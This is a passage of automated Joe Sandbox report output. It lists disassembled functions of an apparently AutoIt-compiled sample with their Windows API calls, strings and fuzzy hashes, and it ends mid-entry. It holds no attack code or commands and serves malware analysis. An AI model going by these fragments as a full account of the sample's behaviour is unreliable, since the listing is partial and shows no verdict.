^ ERROR, xrefs: 006627D5
Line %d (File "%s"):, xrefs: 00662769
Error: , xrefs: 006627F7
%s (%d) : ==> %s: %s %s, xrefs: 00662824

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 618562835-2268648507
Opcode ID: 2f96b088d60ecb5857529533b0e05d396c413eae756c0a5878e59964a2983545
Instruction ID: a1a964b0551e969ea65b988108da37de66e08db521885ecbc4e384ae433cc183
Opcode Fuzzy Hash: 2f96b088d60ecb5857529533b0e05d396c413eae756c0a5878e59964a2983545
Instruction Fuzzy Hash: 9F415E72800629BBCB54FBE0ED96DEEB77AAF15340F100069B50277092EA706F59CF65

Function 0066D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0066D0D8
__swprintf.LIBCMT ref: 0066D0FA
CreateDirectoryW.KERNEL32(?,00000000), ref: 0066D137
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0066D15C
_memset.LIBCMT ref: 0066D17B
_wcsncpy.LIBCMT ref: 0066D1B7
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0066D1EC
CloseHandle.KERNEL32(00000000), ref: 0066D1F7
RemoveDirectoryW.KERNEL32(?), ref: 0066D200
CloseHandle.KERNEL32(00000000), ref: 0066D20A

Strings

\??\%s, xrefs: 0066D0F4
:, xrefs: 0066D11B
\, xrefs: 0066D110

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 846c49dcace1f81bae8db510ebf64f992d7a70c7ee3b345063dcecd56069ad28
Instruction ID: 454ed49fb85175f3f0cb5806df7562f6c88d44bb48e3e7b17d5dc65dc2ce6913
Opcode Fuzzy Hash: 846c49dcace1f81bae8db510ebf64f992d7a70c7ee3b345063dcecd56069ad28
Instruction Fuzzy Hash: 56319671A00119ABDB21DFA0DC49FEB77BEEF8A740F1040B9F609D6160E770A7458B24

Function 0068E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0068BEF4,?,?), ref: 0068E754
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0068BEF4,?,?,00000000,?), ref: 0068E76B
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0068BEF4,?,?,00000000,?), ref: 0068E776
CloseHandle.KERNEL32(00000000,?,?,?,?,0068BEF4,?,?,00000000,?), ref: 0068E783
GlobalLock.KERNEL32(00000000), ref: 0068E78C
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0068BEF4,?,?,00000000,?), ref: 0068E79B
GlobalUnlock.KERNEL32(00000000), ref: 0068E7A4
CloseHandle.KERNEL32(00000000,?,?,?,?,0068BEF4,?,?,00000000,?), ref: 0068E7AB
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0068BEF4,?,?,00000000,?), ref: 0068E7BC
OleLoadPicture.OLEAUT32(?,00000000,00000000,006AD9BC,?), ref: 0068E7D5
GlobalFree.KERNEL32(00000000), ref: 0068E7E5
GetObjectW.GDI32(00000000,00000018,?), ref: 0068E809
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0068E834
DeleteObject.GDI32(00000000), ref: 0068E85C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0068E872

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 78a01480146986ca1ba93602c4117c3522c960e1fd306f96c689849a3cb4a2ba
Instruction ID: c7b725f99dc98ea3d20397dded482498a77a27a377108f507f051c53abbb318b
Opcode Fuzzy Hash: 78a01480146986ca1ba93602c4117c3522c960e1fd306f96c689849a3cb4a2ba
Instruction Fuzzy Hash: 7341F875600204EFDB11AF65DC88EAE7BBAEF8A715F108168F90697260D731AD41DF60

Function 006705F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0067076F
_wcscat.LIBCMT ref: 00670787
_wcscat.LIBCMT ref: 00670799
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006707AE
SetCurrentDirectoryW.KERNEL32(?), ref: 006707C2
GetFileAttributesW.KERNEL32(?), ref: 006707DA
SetFileAttributesW.KERNEL32(?,00000000), ref: 006707F4
SetCurrentDirectoryW.KERNEL32(?), ref: 00670806

Strings

*.*, xrefs: 00670845

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: f551100ab9f6b95b7802c4693d20f720768ba4489d1a32b3e9797e61b47937ce
Instruction ID: 3670305ab915ec7a73316d1cb46d63707065b8ac379a696a695de68f937c576c
Opcode Fuzzy Hash: f551100ab9f6b95b7802c4693d20f720768ba4489d1a32b3e9797e61b47937ce
Instruction Fuzzy Hash: EE817071504301DFEB64EF24C8559AEB7EABBC9304F14882EF889D7351E630E9558FA2

Function 0068EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0063B34E: GetWindowLongW.USER32(?,000000EB), ref: 0063B35F

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0068EF3B
GetFocus.USER32 ref: 0068EF4B
GetDlgCtrlID.USER32(00000000), ref: 0068EF56
_memset.LIBCMT ref: 0068F081
GetMenuItemInfoW.USER32 ref: 0068F0AC
GetMenuItemCount.USER32(00000000), ref: 0068F0CC
GetMenuItemID.USER32(?,00000000), ref: 0068F0DF
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0068F113
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0068F15B
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0068F193
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0068F1C8

Strings

0, xrefs: 0068F079

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: bc9d1cb3d0c1f0440e5d24d80ebd129924108eab40d6190478c99fcbf98c0a7a
Instruction ID: 90decd540377a394a6f82b95436d5fddbec7ce1befaf8f462f308346a81c1918
Opcode Fuzzy Hash: bc9d1cb3d0c1f0440e5d24d80ebd129924108eab40d6190478c99fcbf98c0a7a
Instruction Fuzzy Hash: 6A817E71608301EFD710EF14C888AABBBEAFB89314F14462EF99597291D771D905CBA2

Function 0065A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0065ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0065ABD7
Part of subcall function 0065ABBB: GetLastError.KERNEL32(?,0065A69F,?,?,?), ref: 0065ABE1
Part of subcall function 0065ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0065A69F,?,?,?), ref: 0065ABF0
Part of subcall function 0065ABBB: HeapAlloc.KERNEL32(00000000,?,0065A69F,?,?,?), ref: 0065ABF7
Part of subcall function 0065ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0065AC0E

Part of subcall function 0065AC56: GetProcessHeap.KERNEL32(00000008,0065A6B5,00000000,00000000,?,0065A6B5,?), ref: 0065AC62
Part of subcall function 0065AC56: HeapAlloc.KERNEL32(00000000,?,0065A6B5,?), ref: 0065AC69
Part of subcall function 0065AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0065A6B5,?), ref: 0065AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0065A8CB
_memset.LIBCMT ref: 0065A8E0
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0065A8FF
GetLengthSid.ADVAPI32(?), ref: 0065A910
GetAce.ADVAPI32(?,00000000,?), ref: 0065A94D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0065A969
GetLengthSid.ADVAPI32(?), ref: 0065A986
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0065A995
HeapAlloc.KERNEL32(00000000), ref: 0065A99C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0065A9BD
CopySid.ADVAPI32(00000000), ref: 0065A9C4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0065A9F5
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0065AA1B
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0065AA2F

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 849e5c61876667bbba91f7ab8227ed92150cf360ee6668b81b07afc7489e1f7e
Instruction ID: 8114e4cd8a16bc929f084f19c49467efceb1c16f60a4a7d0853714f4b7fdd67b
Opcode Fuzzy Hash: 849e5c61876667bbba91f7ab8227ed92150cf360ee6668b81b07afc7489e1f7e
Instruction Fuzzy Hash: AE513C71900219AFDF10DF94DD85AEEBB7AFF05301F04821AF956A7290DB359A09CF61

Function 0066CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 0066CCA3
LoadStringW.USER32(?,?,00000FFF,?), ref: 0066CCC5
__swprintf.LIBCMT ref: 0066CD1E
__swprintf.LIBCMT ref: 0066CD37
_wprintf.LIBCMT ref: 0066CDED
_wprintf.LIBCMT ref: 0066CE0B

Strings

"%s" (%d) : ==> %s:, xrefs: 0066CE06
"%s" (%d) : ==> %s:%s%s, xrefs: 0066CDE8
^ ERROR, xrefs: 0066CD8F
Line %d (File "%s"):, xrefs: 0066CD18, 0066CD31
Error: , xrefs: 0066CDB5

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-2391861430
Opcode ID: ed82c39bbf3ec5ba3cf460b2c181a39db2afaa4c1e3a193e9d44b0b3aa2c70fd
Instruction ID: 0de0a2e7a1e5ad22c2003d80a075ea4f32ad040965c1762dce9f9b5623402677
Opcode Fuzzy Hash: ed82c39bbf3ec5ba3cf460b2c181a39db2afaa4c1e3a193e9d44b0b3aa2c70fd
Instruction Fuzzy Hash: EA51B031800A19BBCB54EBA0DD86EEEB77AAF05350F10006AF405761A2EB316F59DF65

Function 0066CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0066CA8F
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0066CAB0
__swprintf.LIBCMT ref: 0066CB09
__swprintf.LIBCMT ref: 0066CB22
_wprintf.LIBCMT ref: 0066CBCD
_wprintf.LIBCMT ref: 0066CBEB

Strings

"%s" (%d) : ==> %s:, xrefs: 0066CBE6
"%s" (%d) : ==> %s:%s%s, xrefs: 0066CBC8
Line %d (File "%s"):, xrefs: 0066CB03, 0066CB1C
Error: , xrefs: 0066CB95
^ ERROR , xrefs: 0066CB64

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-3420473620
Opcode ID: c3dd2ff546671afd050421591e6a5b7e9f8a96b41623c3fbf8b0fbd86d95a141
Instruction ID: b577c2302ed27187541c1a7161f49d9ca191d6d59889fd4fc351070d93fcc868
Opcode Fuzzy Hash: c3dd2ff546671afd050421591e6a5b7e9f8a96b41623c3fbf8b0fbd86d95a141
Instruction Fuzzy Hash: 2051D171900A19AACF14EBE0DD46EEEB77AAF05340F10006AF40677192EB706F99DF65

Function 00683C06 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00682BB5,?,?), ref: 00683C1D

Strings

$Em, xrefs: 00683C36
HKU, xrefs: 00683D15
HKEY_USERS, xrefs: 00683D04
HKEY_LOCAL_MACHINE, xrefs: 00683C6C
HKLM, xrefs: 00683C81
HKCC, xrefs: 00683CD1
HKCU, xrefs: 00683CF3
HKEY_CLASSES_ROOT, xrefs: 00683C96
HKEY_CURRENT_CONFIG, xrefs: 00683CC0
HKCR, xrefs: 00683CAB
HKEY_CURRENT_USER, xrefs: 00683CE2

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: BuffCharUpper
String ID: $Em$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-3613096251
Opcode ID: bc8b1f698e50a254e708cb890e9da22e8d6ef39da18b8fa15d5dce6fff6e33b2
Instruction ID: abc4d16b10f469160e60c9818fc1c45127584725c402ce13c60da79216eb191e
Opcode Fuzzy Hash: bc8b1f698e50a254e708cb890e9da22e8d6ef39da18b8fa15d5dce6fff6e33b2
Instruction Fuzzy Hash: B441403051025A8BCF54FF10E851AEE3767EF22740F106959EC652B392EB71AE0ACB64

Function 006655BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006655D7
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00665664
GetMenuItemCount.USER32(006E1708), ref: 006656ED
DeleteMenu.USER32(006E1708,00000005,00000000,000000F5,?,?), ref: 0066577D
DeleteMenu.USER32(006E1708,00000004,00000000), ref: 00665785
DeleteMenu.USER32(006E1708,00000006,00000000), ref: 0066578D
DeleteMenu.USER32(006E1708,00000003,00000000), ref: 00665795
GetMenuItemCount.USER32(006E1708), ref: 0066579D
SetMenuItemInfoW.USER32(006E1708,00000004,00000000,00000030), ref: 006657D3
GetCursorPos.USER32(?), ref: 006657DD
SetForegroundWindow.USER32(00000000), ref: 006657E6
TrackPopupMenuEx.USER32(006E1708,00000000,?,00000000,00000000,00000000), ref: 006657F9
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00665805

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: edd00755b4d118992774ef390ee1393770451aff0b64ce3f4ce8eb077eb6a32a
Instruction ID: 009cbfd8c29d5fcb9d27716cc5e8f6e6ed36a1aa481027953121803dc8413408
Opcode Fuzzy Hash: edd00755b4d118992774ef390ee1393770451aff0b64ce3f4ce8eb077eb6a32a
Instruction Fuzzy Hash: 6671E370640615BFEB209F54CC4AFEABF66FF01364F240209F516AA2E1C7B16C10DBA4

Function 0065A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0065A1DC
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0065A211
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0065A22D
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0065A249
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0065A273
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0065A29B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0065A2A6
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0065A2AB

Strings

SOFTWARE\Classes\, xrefs: 0065A17D
\IPC$, xrefs: 0065A1F3
\CLSID, xrefs: 0065A193

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1687751970-22481851
Opcode ID: 2384893c52f65fd2473d3ab0ed976d9dbee28888696e11bf0f8377b8bacb8c38
Instruction ID: a251db24ed676e7767a74815b0a958fddac9a5197373c096f8035a903aa8dba6
Opcode Fuzzy Hash: 2384893c52f65fd2473d3ab0ed976d9dbee28888696e11bf0f8377b8bacb8c38
Instruction Fuzzy Hash: 8F41F876C10629ABDB21EBA4EC95DEDB77ABF14350F044169F902A3260EA709E09CF54

Function 006667E9 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 006667FD
__swprintf.LIBCMT ref: 0066680A

Part of subcall function 0064172B: __woutput_l.LIBCMT ref: 00641784

FindResourceW.KERNEL32(?,?,0000000E), ref: 00666834
LoadResource.KERNEL32(?,00000000), ref: 00666840
LockResource.KERNEL32(00000000), ref: 0066684D
FindResourceW.KERNEL32(?,?,00000003), ref: 0066686D
LoadResource.KERNEL32(?,00000000), ref: 0066687F
SizeofResource.KERNEL32(?,00000000), ref: 0066688E
LockResource.KERNEL32(?), ref: 0066689A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 006668F9

Strings

5m, xrefs: 006667F6

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID: 5m
API String ID: 1433390588-1963150287
Opcode ID: 3b6eba522e28dee20956446ada0293cc964ad7e8582bde4c237a1eb0d0cb7dbd
Instruction ID: e45f1516dd9141c301c90a748f0f608b7297057705bbbe7649e9e96172ac0085
Opcode Fuzzy Hash: 3b6eba522e28dee20956446ada0293cc964ad7e8582bde4c237a1eb0d0cb7dbd
Instruction Fuzzy Hash: 55318E7190025AABDB10AF71ED45AFE7BAAEF09344B108429F912D7250E730DA51DBB4

Function 006625B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,006936F4,00000010,?,Bad directive syntax error,006BDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 006625D6
LoadStringW.USER32(00000000,?,006936F4,00000010), ref: 006625DD
_wprintf.LIBCMT ref: 00662610
__swprintf.LIBCMT ref: 00662632
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 006626A1

Strings

., xrefs: 00662687
Line %d:, xrefs: 0066262C
%s (%d) : ==> %s.: %s %s, xrefs: 0066260B
Line %d (File "%s"):, xrefs: 00662647
Error: , xrefs: 0066266F

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1080873982-4153970271
Opcode ID: bc0f9c320a4316a7d0d1c7227ff6ef701efbf61ad6b8e5bf6d24ced47f37afd1
Instruction ID: dd420c900ea8b97f89a92251be3308c1a6dbbb6187f0b85012f33d6d60c9fef5
Opcode Fuzzy Hash: bc0f9c320a4316a7d0d1c7227ff6ef701efbf61ad6b8e5bf6d24ced47f37afd1
Instruction Fuzzy Hash: 06218231C0062ABFCF11BF90DC0AEEE773ABF19304F000459F506661A2DA71AA64DF55

Function 00667AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00667B42
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00667B58
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00667B69
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00667B7B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00667B8C

Strings

play PlayMe wait, xrefs: 00667B76
